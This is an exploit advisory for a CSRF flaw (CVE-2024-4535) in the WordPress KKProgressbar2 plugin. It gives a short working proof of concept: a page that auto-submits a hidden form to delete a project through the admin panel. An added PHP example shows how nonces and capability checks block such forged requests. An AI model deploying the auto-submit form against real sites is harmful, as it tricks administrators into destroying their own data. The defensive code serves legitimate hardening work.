WordPress KKProgressbar2 1.1.4.2 Cross Site Request Forgery
# Exploit Title: WordPress Plugin KKProgressbar2 - Cross-Site Request Forgery (CSRF)
# Date: 2025-10-05
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Tested on: Win, Ubuntu
# CVE : CVE-2024-4535

POC:

<body onload="document.forms[0].submit()">
<form action="http://target.com/wp-admin/admin.php?page=kkpb-menu" method="post">
<input type="hidden" name="action" value="delete-project">
<input type="hidden" name="id" value="<<ID>>">
</form>
</body>
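
The form above carries only `action` and `id`, so nothing in the request ties it to a page the administrator actually loaded. The following is an added example, not the plugin's own code, of a delete handler that rejects such a request using WordPress nonces and a capability check; the function names, nonce field name, table name and the `manage_options` capability are assumptions.

```php
<?php
// Added example. Function names, nonce names and the table name are
// hypothetical; the plugin's real handler is not shown on this page.

// Render the delete form with a nonce bound to the user, session and project.
function example_kkpb_delete_form( $project_id ) {
    $project_id = absint( $project_id );
    $action_url = admin_url( 'admin.php?page=kkpb-menu' );
    echo '<form method="post" action="' . esc_url( $action_url ) . '">';
    echo '<input type="hidden" name="action" value="delete-project">';
    echo '<input type="hidden" name="id" value="' . esc_attr( $project_id ) . '">';
    wp_nonce_field( 'example_kkpb_delete_' . $project_id, 'example_kkpb_nonce' );
    submit_button( 'Delete project', 'delete' );
    echo '</form>';
}

// Process the POST only when capability and nonce both check out.
function example_kkpb_handle_delete() {
    global $wpdb;

    $page   = isset( $_GET['page'] ) ? sanitize_key( wp_unslash( $_GET['page'] ) ) : '';
    $action = isset( $_POST['action'] ) ? sanitize_key( wp_unslash( $_POST['action'] ) ) : '';
    if ( 'kkpb-menu' !== $page || 'delete-project' !== $action ) {
        return; // Not a delete request for this screen.
    }

    // Assumed capability; use whatever the plugin's menu page requires.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'You are not allowed to delete projects.', '', array( 'response' => 403 ) );
    }

    $project_id = isset( $_POST['id'] ) ? absint( wp_unslash( $_POST['id'] ) ) : 0;

    // Dies with a 403 "link expired" page when the nonce is missing or wrong,
    // which is what a forged cross-site form submission produces.
    check_admin_referer( 'example_kkpb_delete_' . $project_id, 'example_kkpb_nonce' );

    // Hypothetical table name; parameterised delete via $wpdb.
    $wpdb->delete( $wpdb->prefix . 'example_kkpb_projects', array( 'id' => $project_id ), array( '%d' ) );
}
add_action( 'admin_init', 'example_kkpb_handle_delete' );
```

Because the nonce action string includes the project ID, a token issued for one project cannot be replayed to delete another.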